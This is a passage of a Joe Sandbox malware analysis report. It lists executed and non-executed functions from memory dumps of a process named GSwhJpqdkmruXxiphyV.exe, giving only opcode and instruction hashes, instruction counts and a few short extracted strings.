Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8321dd3323b813445849572f047289439fe0fb7c0cf4bcdbd3a63364a3775e5
Instruction ID: a904e8e7784ee22f1a0e4aa37ebf343b658113913b15ac57ddcf6d7b7c30953e
Opcode Fuzzy Hash: b8321dd3323b813445849572f047289439fe0fb7c0cf4bcdbd3a63364a3775e5
Instruction Fuzzy Hash: 2611F93134850F8BDF18DF58E4653E9B3A1FB99365F50017AD90AC36D1DA66A59087C0

Function 00007FFD9C22217E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623e0b380700cd03947a3849645d5511463940b863b0f5cbc4ccab336e5c40d6
Instruction ID: a9b3646c443a7e53fe0c9c35225bb801691c6754747cbec91cd4e6a2bff9abb6
Opcode Fuzzy Hash: 623e0b380700cd03947a3849645d5511463940b863b0f5cbc4ccab336e5c40d6
Instruction Fuzzy Hash: 7401453130890E8FEB18DF48E4A53E97391FB98325F20013AE909C3291CA2AA891C7C0

Function 00007FFD9BAB10BD Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0745d84aae180e5ea8cf1a6b84c812d762504128742847312a7998eaf473d428
Instruction ID: 7e0814567cd400e9c9185066c5a9a83e57eebafb3ffb23079e063a71665a66f6
Opcode Fuzzy Hash: 0745d84aae180e5ea8cf1a6b84c812d762504128742847312a7998eaf473d428
Instruction Fuzzy Hash: EC012621E8E6D50FE76947A09C719E23FD4CF97350B0A01FAE095CB1A3CC8D18878761

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d183061d76ac533aba0396e4473c33a09561c51be7d99e6f77562f9179b25c9c
Instruction ID: 9b10748b5356fded53f850fcae9d4b78a36c16d97443114c561e8933529ba012
Opcode Fuzzy Hash: d183061d76ac533aba0396e4473c33a09561c51be7d99e6f77562f9179b25c9c
Instruction Fuzzy Hash: D0112531B0D65C8FE722EBA8C8601EC7FB0EF42310F0644B3C054DB2A2EA7466058B80

Function 00007FFD9BE76C1E Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2034743479.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b5cf10db35be2199de5c7e6a7092f7168cc70f7797b44cfe42f668625fd523c
Instruction ID: 2120005c82d94e6f30c9dc4b96c23fb5e8744fd323cee236ea3548e32d78ec08
Opcode Fuzzy Hash: 3b5cf10db35be2199de5c7e6a7092f7168cc70f7797b44cfe42f668625fd523c
Instruction Fuzzy Hash: B501F931B1DA4D4FDF58FBA894A22EC7BA1EF4A314F11417DD00ED32E3DA26A8428340

Function 00007FFD9BE7BEA8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2034743479.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d689c6ff4a5b078326beb2a391db895eeed52beb0f173db6ca74dd789d51c1
Instruction ID: 2bd287acbb219a1bc4bfe016655ac4aacd6b911eaf3dc323b76c6ccd3d0f3322
Opcode Fuzzy Hash: 72d689c6ff4a5b078326beb2a391db895eeed52beb0f173db6ca74dd789d51c1
Instruction Fuzzy Hash: A811E535E1981EDFDB98DB98D8E09BDB7B1FF58300F110179E10AE36A0CB35A9018B50

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027722d538dfeac51441019752d4c30fd3417f61645a41ca3d44ae307410482a
Instruction ID: 07238b1738e77807cd30faf0eb42513f7d2828dd29cadfa8e10855184139ecdc
Opcode Fuzzy Hash: 027722d538dfeac51441019752d4c30fd3417f61645a41ca3d44ae307410482a
Instruction Fuzzy Hash: 3301D631A0D69C8FE722DBA8C8601DD7FB0EF52310F1545F7D054DB2A2DA746645CB80

Function 00007FFD9C228C62 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4252ce40870230857f4bd374bb65dd38cf0a5044fa11efe5f6801d9f844137
Instruction ID: 81af10c30332dac0c4f93233130f7911e0d719001225a6ae19f1a23ca5c8affa
Opcode Fuzzy Hash: ac4252ce40870230857f4bd374bb65dd38cf0a5044fa11efe5f6801d9f844137
Instruction Fuzzy Hash: 4F11A231A1891ECFDBACDB88D8A0AACB7B1FF58354F500179D00EE3291CB34A841CB54

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9476e8107976a0df959be2a019d855931c33ee76b9c4c9a7bbf04a198c32b007
Instruction ID: c8698ccdd88d6b379ba51814eed76909dd3db337cd0d9df8b3c9680c2bba796f
Opcode Fuzzy Hash: 9476e8107976a0df959be2a019d855931c33ee76b9c4c9a7bbf04a198c32b007
Instruction Fuzzy Hash: 3C01B131A0E28C8FE722EBA8C8601DD7FB0EF42314F1541F7D054DB2A2EA746645CB80

Function 00007FFD9BE775C0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2034743479.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fdd4ed8b4b68f8bd69386d05fd3647b2f4228fe22267d89b523bbace989eddd
Instruction ID: 221bd614d53c1c3127d3a13122b6af51fcbcacd1c90b60d25be99c106d120ea0
Opcode Fuzzy Hash: 0fdd4ed8b4b68f8bd69386d05fd3647b2f4228fe22267d89b523bbace989eddd
Instruction Fuzzy Hash: 9501AC3130D24B4FDB05DB68D8B67E877D0EF16314F1502BED505CB2E1D65A9640C780

Function 00007FFD9BE75DB2 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2034743479.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80bd1ba52a1098616841ee00d486fcaf6692cfb6f4343c8fd9f73b6967b110a4
Instruction ID: 11549af6faa2e41bfccc84bce23f81c490f58ab7e1bb14e7ba72852891723a71
Opcode Fuzzy Hash: 80bd1ba52a1098616841ee00d486fcaf6692cfb6f4343c8fd9f73b6967b110a4
Instruction Fuzzy Hash: BFF0623194F3CA9FD7128BB088658DA3FF8EF43214B1A01FAD155CB0A2CA6E5646C761

Function 00007FFD9C229A42 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b75ebcdba7d7262493d4ce37b70f4dfe81ce98bbd0ceb1994d76bd805d039c
Instruction ID: d75078286498e473986e4b7fde476de1812a27d41ee3584a0c18c630a28ba3e7
Opcode Fuzzy Hash: 66b75ebcdba7d7262493d4ce37b70f4dfe81ce98bbd0ceb1994d76bd805d039c
Instruction Fuzzy Hash: 65F0623294E3C69FD716ABB088656D97FB4EF43240F5800F6D085871A2C57C664AC761

Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97edfec636560f01cc5d7281eb233d68b93afa8df8fe0eb94d16cc545c24500f
Instruction ID: de049c5f4bb0915be4deff42a639f20c3a2cdb96e937646ceff440b5241504c7
Opcode Fuzzy Hash: 97edfec636560f01cc5d7281eb233d68b93afa8df8fe0eb94d16cc545c24500f
Instruction Fuzzy Hash: 9601A230E0E28D8FE722EBA488641DD7FB0EF56304F1541E7D054DB2A6EA786644CB80

Function 00007FFD9C220962 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f32a04e025ff204c124094152ca6fb550171a076362416250217b8563c522e5
Instruction ID: 768a607c5f41e5acbc682176f477e884337eeb116f3587de1bf13a39c9981343
Opcode Fuzzy Hash: 1f32a04e025ff204c124094152ca6fb550171a076362416250217b8563c522e5
Instruction Fuzzy Hash: 0DF02B3248E3CADFD316DBB0C8215E93FB4AF43214F5400F6D086C70A2C62D660AC762

Function 00007FFD9BAB0BB5 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d283239810f0ccb5d164cde3f53217df99839333aa2619b94ec510ff119a55
Instruction ID: 11b705f25e3a5377e52c7fdc41be5ed4be136e49de2c27a4993b663bd020b5d7
Opcode Fuzzy Hash: 54d283239810f0ccb5d164cde3f53217df99839333aa2619b94ec510ff119a55
Instruction Fuzzy Hash: BBF05C20B9F50E4FD92067B4C8E24E87F60FF06210FC605F1D04DC60A2D64A0599CB02

Function 00007FFD9C22F132 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12c21dee0eb9b9f298f49fce68c95d627204fee66f294381a0580f9741a1c26
Instruction ID: 6e88caac5f111568c904cae346bc8f20a212727292a034f15e65f818e48407a0
Opcode Fuzzy Hash: d12c21dee0eb9b9f298f49fce68c95d627204fee66f294381a0580f9741a1c26
Instruction Fuzzy Hash: 3DF0F63144E3C69FD3168BB0C8216D57FB4EF43310F4900F6D049C71A2C62C1606C351

Function 00007FFD9BAB22A4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6370e4b7c2f06723772d41f673dc79b8ed7ea3d9e078e676155488c3bb5a2cb
Instruction ID: 73cb720ad7105f7e2f761cd9bc2d409f53690697f36f31daa67cd0e260310277
Opcode Fuzzy Hash: d6370e4b7c2f06723772d41f673dc79b8ed7ea3d9e078e676155488c3bb5a2cb
Instruction Fuzzy Hash: 56F04934608A18CFCB18EF58C8D5AA9B7F1FBA8311F10422EC40AD32A1CB31E941CF81

Function 00007FFD9BAB0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5ad26d25c375b1bfd97a6de794d683c40b15f3ecb390c4bed909f56796f909
Instruction ID: dfb73463528604aec6d97fe3a8d9b66585bcf310b5cfc5cb72b202eb6d234413
Opcode Fuzzy Hash: 7d5ad26d25c375b1bfd97a6de794d683c40b15f3ecb390c4bed909f56796f909
Instruction Fuzzy Hash: D0F0E53525AA44CFC7519B38DCE54D4BF60FF02219B561AEAD0CAC7562D326585DCF00

Function 00007FFD9C22DC0A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1154bc01f0a73acec6685547f73d10310d49514731c843182cf6ff75be49594a
Instruction ID: ae5f9c6d921d80a81a1805c5199b916f9eb64fca6a9076b66d0b8aa41b536071
Opcode Fuzzy Hash: 1154bc01f0a73acec6685547f73d10310d49514731c843182cf6ff75be49594a
Instruction Fuzzy Hash: 58F0B436B0D7478BFF29DA48D8B03E533A1AFC13A5F9442B6C84D8B3C1CA75544AC690

Function 00007FFD9BAB10F0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19c1046af61c06c2d47e9f21cb2cb2d9e5d38e65fd399fc6f28f71e8ef00f04
Instruction ID: 9e34096d53ddeb80ef9b8ec52d4cc98edafe2bc80c69aa193678a462f1715816
Opcode Fuzzy Hash: f19c1046af61c06c2d47e9f21cb2cb2d9e5d38e65fd399fc6f28f71e8ef00f04
Instruction Fuzzy Hash: F6E07D21F5CC1907EB7CA6747CB15F07380DB86324B0501BED06AC62D6CC4D5CC14381

Function 00007FFD9BAB5FD0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a0a7da12cba2cf70a9bd085c3137d62f4ed192707833909f5aa0dce53554042
Instruction ID: d070652176697ca0c6c0e9412b6b898899d2bca8d8e7f4ac5b4c3f6f0f5390cb
Opcode Fuzzy Hash: 1a0a7da12cba2cf70a9bd085c3137d62f4ed192707833909f5aa0dce53554042
Instruction Fuzzy Hash: E8F03030F1A52A8FF7B05B94C4603B922A1EF94310F5201B9D91E973E1DE786E829F45

Function 00007FFD9BAB0845 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a0c4a719a065fe83efd92f09a9600c595957d2c48b3161f7e1b288b6f4c099
Instruction ID: 203643171fbe04a84f0fcd2c0c266a5d32947a661e8124394b28d86cedf0abae
Opcode Fuzzy Hash: f7a0c4a719a065fe83efd92f09a9600c595957d2c48b3161f7e1b288b6f4c099
Instruction Fuzzy Hash: 7CE072243089445FC728B7ACCCA04DD7BA0EF06326B8600F2E04CC60A2E608E8D7C390

Function 00007FFD9BE7D6C7 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2034743479.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7891c1cf45168a89a804e523bb60d23263f05b46e8226bea4a5e2fc1f795aea1
Instruction ID: cd1c8e7aac97ec43f5760f813ba219ee7472f2da5351f9be2ac7520d25c44b64
Opcode Fuzzy Hash: 7891c1cf45168a89a804e523bb60d23263f05b46e8226bea4a5e2fc1f795aea1
Instruction Fuzzy Hash: 27E0C2A1F0E7864BFB315AF408F52782A68DF1730070A05BBD48A4B1E3DA5A3E049712

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed396eb7f48c9a038e79e4b67fcf03dbbe0eff019bdc4f06909d0122c1464989
Instruction ID: 124d1c8e0f00d12945a844453762bbe83d12681ab4623172fb7678e6ad5253db
Opcode Fuzzy Hash: ed396eb7f48c9a038e79e4b67fcf03dbbe0eff019bdc4f06909d0122c1464989
Instruction Fuzzy Hash: 10C01200F1B62E00E43433AB24220ACB100ABC4A10FD70132D129800E1A8DD2285095A

Function 00007FFD9BE7759B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2034743479.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
Instruction ID: 41eaafd5cee4fce11ef9b53bf5181358401910b2ce331dbd394a9af0911e9018
Opcode Fuzzy Hash: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
Instruction Fuzzy Hash: 9ED09210B0E64B85F139878181B063A29EDCF44701E62013DC4AF439F1CD1EB601661A

Function 00007FFD9C22215B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1488b82cafc32de49ac62fc9b6816fdc9e14f61f94c19c5947a45501630326dc
Instruction ID: 1308ef290cbad1893933fbbfba51781bfc0df948863ac80ba746bb95c7f6aee0
Opcode Fuzzy Hash: 1488b82cafc32de49ac62fc9b6816fdc9e14f61f94c19c5947a45501630326dc
Instruction Fuzzy Hash: 6BD09210B0D51B85F67C5685813177A31B45F407A0EE00139D19F45BC3CA2AB5016602

Function 00007FFD9C22B20B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
Instruction ID: 5a3198dbea562b5f48906f9711a99ce57f4b78c4e0fe7b651f1164505d7e60d7
Opcode Fuzzy Hash: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
Instruction Fuzzy Hash: 48D0CA24F0D60386F27C46C190B133E31B08F407C0EE8423EC0AF8ABC2CD9CB901A202

Function 00007FFD9BE775AE Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2034743479.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383ce5041602820d480b357e0ab4d1ee05ee7f56ec0e852c426cfe0f4b183b42
Instruction ID: 97f7e7677fde275af7156047ec11b7cdbdcc606a9d4e156113135e20b1a6cc75
Opcode Fuzzy Hash: 383ce5041602820d480b357e0ab4d1ee05ee7f56ec0e852c426cfe0f4b183b42
Instruction Fuzzy Hash: 87C0801070D2474FF2354350807163537E9CF05300F134579C80D474F1CD1637515711

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c5b1af5fbf044a86cf5c59b96b5f4cb349045d2aee5a30757606acc84a1b897
Instruction ID: e8587016dedc69295285c5cbd4e65afc92b5b625e0d1127d362917b452200cc9
Opcode Fuzzy Hash: 5c5b1af5fbf044a86cf5c59b96b5f4cb349045d2aee5a30757606acc84a1b897
Instruction Fuzzy Hash: 71B01200D6755F00E43833FB18520687040BB44204FC60170D41E901D1A8CD12940657

Function 00007FFD9BE76ABF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2034743479.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
Instruction ID: c8ceda775b6fea340d8c9c397969232388bcfc42038849d9f6c8ca9d90a7348f
Opcode Fuzzy Hash: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
Instruction Fuzzy Hash: 92C04C40F1E25B5BE63111E008E507C1654CF162047574575D2069B1E3E94D6A055311

Function 00007FFD9C22166F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e261ba770b00ec99d4405de6c328d48a0b3a4845d408394211202458e0ea6fa0
Instruction ID: 97854a0348af70c1bbbad049b9c9adbed8111bac2c386fc34b5225fff20d3df6
Opcode Fuzzy Hash: e261ba770b00ec99d4405de6c328d48a0b3a4845d408394211202458e0ea6fa0
Instruction Fuzzy Hash: 0CC04C41F0D24756FA3911E008B15BC16505B16245BD70575D106452D3D85D6D095651

Function 00007FFD9C22A751 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2044211995.00007FFD9C220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c220000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc4feeed5d67da2f431a81c625bd3c0f197f172cefdf09a6d949af9ff1863ff
Instruction ID: a22374bbe0173f416c485294f6125cb142315ab51353ec4584e27a6ad28ca3b1
Opcode Fuzzy Hash: ffc4feeed5d67da2f431a81c625bd3c0f197f172cefdf09a6d949af9ff1863ff
Instruction Fuzzy Hash: C8B01200F0C303C3F13C41F8047133C21714B062C0AD00930D15F457C3DC4C39082211

Non-executed Functions

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 182COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD9BAB0B56
!k9, xrefs: 00007FFD9BAB0B4E
#{9, xrefs: 00007FFD9BAB0B3E
"s9, xrefs: 00007FFD9BAB0B46

Memory Dump Source

Source File: 0000000E.00000002.2028296938.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 3129ee7811841a7776eba927273f8ccbd68f6ef8a34b689971b110ce51c0e662
Instruction ID: d8c0e06dd3db4d4c4bae3628f49b7cf4b93b20a28570eab6bf225ca748c84aeb
Opcode Fuzzy Hash: 3129ee7811841a7776eba927273f8ccbd68f6ef8a34b689971b110ce51c0e662
Instruction Fuzzy Hash: 35417F07B0957645E23973FD78219ED9B448FA927FB0847BBF56E8D0D74C486081C2E9

Analysis Process: GSwhJpqdkmruXxiphyV.exePID: 5052, Parent PID: 1608COMMON

Executed Functions

Function 00007FFD9BE71365 Relevance: 2.1, Strings: 1, Instructions: 893COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9BE717D7

Memory Dump Source

Source File: 00000014.00000002.2219822202.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be70000_GSwhJpqdkmruXxiphyV.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: c50902228f8af1672a89cb963e1db121bcb1efd1ab4d677daae2d315a4afe580
Instruction ID: 2eb2e741f73726213c0de28d67a28b5fca831a37178c4ccb0571fef150a377a7
Opcode Fuzzy Hash: c50902228f8af1672a89cb963e1db121bcb1efd1ab4d677daae2d315a4afe580
Instruction Fuzzy Hash: D3424831B0DB4A4FE719DB6C98A15B477E0EF56314B1902BAD089CB1A7DA25F843C782

Function 00007FFD9BE79211 Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

